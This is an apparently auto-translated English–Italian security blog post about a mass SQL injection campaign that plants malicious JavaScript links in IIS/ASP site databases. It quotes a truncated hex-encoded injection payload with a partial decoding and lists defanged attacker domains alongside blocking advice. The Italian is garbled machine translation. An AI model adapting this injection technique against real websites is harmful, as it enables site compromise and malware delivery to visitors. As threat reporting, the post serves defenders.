Mass SQL injections SQL iniezioni di massa
Earlier this week I published a All'inizio di questa settimana ho pubblicato un post regarding a vulnerability in several versions of Microsoft Windows post per quanto riguarda una vulnerabilità in varie versioni di Microsoft Windows …
…Well the vulnerability is now being executed-there is another round of Mass SQL injections going on which has infected hundreds of thousands of websites running on the IIS platform. Beh… la vulnerabilità viene ora eseguito-vi è un altro ciclo di iniezioni SQL Messa in corso che ha infettato centinaia di migliaia di siti web in esecuzione sulla piattaforma IIS.
Preforming a simple Google search for traces of the malicious script results in over 510,000 modified pages . Preforming una semplice ricerca di Google per le tracce di script dannoso risultati in più di 510000 pagine modificate.
With more and more websites using a SQL back-end to make them faster and more dynamic, it also means that it’s crucial to verify what information get stored in or requested from those databases - especially if you allow users to upload content themselves which happens all the time in discussion forums, blogs, feedback forms etc. Unless that data is sanitized before it gets saved you can’t control what the website will show to the users. Con un numero sempre maggiore di siti web utilizzando un SQL back-end per renderli più veloce e più dinamica, ma significa anche che è cruciale per verificare quali sono le informazioni memorizzate nel ricevere o richiesto da quelle banche dati - specialmente se si consentirà agli utenti di caricare i contenuti stessi che succede tutto il tempo di forum di discussione, blog, commenti ecc forme meno che i dati siano sterilizzate prima che venga salvato non si riesce a controllare ciò che il sito web verranno visualizzati agli utenti. This is what SQL injection is all about, exploiting weaknesses in these controls. Questo è ciò che SQL injection è tutto circa, sfruttando le carenze in questi controlli.
Currently the malicious file that is being injected is 1.js however it must be noted that this could change at any stage. Attualmente il file "maligno" che viene iniettata è 1.js tuttavia occorre rilevare che questo potrebbe cambiare in qualsiasi fase. Visitors to this website are “treated†to 8 different exploits for many windows based applications including AIM, RealPlayer, and iTunes. DO NOT visit sites that link to this site as you are very likely to get infected. Ai visitatori di questo sito web sono â € œtreatedâ € a 8 diversi exploit per molte applicazioni basate su finestre tra cui AIM, RealPlayer, e iTunes. Non visitare siti che contengono link a questo sito come lei sono molto probabilità di trovare infetti. Trendmicro named the malware toj_agent.KAQ it watches for passwords and passes them back to contoller’s ip. Trendmicro nome, il malware è toj_agent.KAQ orologi per le password e passa di nuovo al contollerâ € ™ s ip.
In this case the injection code starts off like this (note, this is not the complete code): In questo caso l'iniezione inizia codice di questo tipo (nota, questo non è il codice completo):
   DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300    4C00410052004500200040005400200076006100720063006800610072    00280032003500350029002C0040004300200076006100720063006800    610072002800320035003500290020004400450043004C004100520045    0020005400610062006C0065005F0043007500720073006F0072002000    43005500520053004F005200200046004F0052002000730065006C0065    0063007400200061002E006E0061006D0065002C0062002E006E006100    6D0065002000660072006F006D0020007300790073006F0062006A0065    00630074007300200061002C0073007900730063006F006C0075006D00    6E00730020006200200077006800650072006500200061002E00690064    003D0062002E0069006400200061006E006400200061002E0078007400    7900700065003D00270075002700200061006E0064002000280062002E    00780074007900700065003D003900390020006F007200200062002E00    780074007900700065003D003300350020006… Which when decoded becomes:    DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor    CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b    where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35    or b…    DICHIARARE% 20 @ S% 20NVARCHAR (4000); SET% 20 @ S = CAST (0x440045004300  4C00410052004500200040005400200076006100720063006800610072        00280032003500350029002C0040004300200076006100720063006800  610072002800320035003500290020004400450043004C004100520045  0020005400610062006C0065005F0043007500720073006F0072002000      43005500520053004F005200200046004F0052002000730065006C0065  0063007400200061002E006E0061006D0065002C0062002E006E006100      6D0065002000660072006F006D0020007300790073006F0062006A0065  00630074007300200061002C0073007900730063006F006C0075006D00        6E00730020006200200077006800650072006500200061002E00690064  003D0062002E0069006400200061006E006400200061002E0078007400  7900700065003D00270075002700200061006E0064002000280062002E        00780074007900700065003D003900390020006F007200200062002E00  780074007900700065003D003300350020006â € | decodificati che, quando diventa:    DICHIARARE @ T varchar (255) '@ C varchar (255) DICHIARARE Table_Cursor    CURSORE PER selezionare a.name 'b.name da sysobjects a'syscolumns b    dove a.id = b.id e a.xtype =' u 'e (b.xtype = 99 o b.xtype = 35    o Bâ € | What happens as a result? Che cosa succede in seguito? It finds all text fields in the database and adds a link to malicious javascript to each and every one of them which will make your website display them automatically. Che trova tutti i campi di testo nel database e aggiunge un link a "maligno" JavaScript per ciascuno e ciascuna di esse, che renderà il vostro sito web li visualizza automaticamente. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as an article ID, product ID, et cetera) parameter and tried to use that to upload their SQL injection code. Quindi, in sostanza, ciò che è accaduto è che gli assalitori cercavano ASP o ASPX pagine contenenti qualsiasi tipo di QueryString (un valore dinamico come ad esempio un articolo ID, ID del prodotto, ecc) parametro e cercato di utilizzare tale da caricare il loro codice SQL injection.
So far three different domains have been used to host the malicious content — nmidahena.com, aspder.com and nihaorr1.com . Finora tre diversi domini sono stati utilizzati per ospitare i contenuti dannosi â € "nmidahena.com, aspder.com e nihaorr1.com. There’sa set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. C'è un insieme di file che viene caricato da questi siti che cerca di utilizzare diversi exploit per installare un trojan di gioco online. Right now the initial exploit page on all domains are inaccessible but that could change. Adesso la pagina iniziale di sfruttare a tutti i domini sono inaccessibili, ma che potrebbe cambiare. So if you’re a firewall administrator we recommend you to block access to them. Quindi, se sei un amministratore di firewall ti consigliamo di bloccare l'accesso ad essi.
I would recommend that Administrators block access to hxxp:/www.nihaorr1.com and the IP it resolves to 219DOT153DOT46DOT28 at the edge or border of your network. La mia raccomandazione è che gli amministratori block accesso a hxxp: / www.nihaorr1.com e il PI si risolve a 219DOT153DOT46DOT28 sul bordo o di confine di rete.
Info sourced from Informazioni provenienti da f-secure F-Secure
Written by Patrick S. Read more great feeds at is source Scritto da Patrick S. saperne di più grande al feed è fonte WEBSITE SITO WEB
no comments nessun commento . .
Read more articles on Per saperne di più articoli su otherSoftware otherSoftware and e MS News MS News . .
- [+] Digg [+] Digg : Feature this article : Feature questo articolo
- [+] Del.icio.us [+] Del.icio.us : Bookmark this article : Bookmark questo articolo
- [+] Furl [+] Furl : Bookmark this article : Bookmark questo articolo















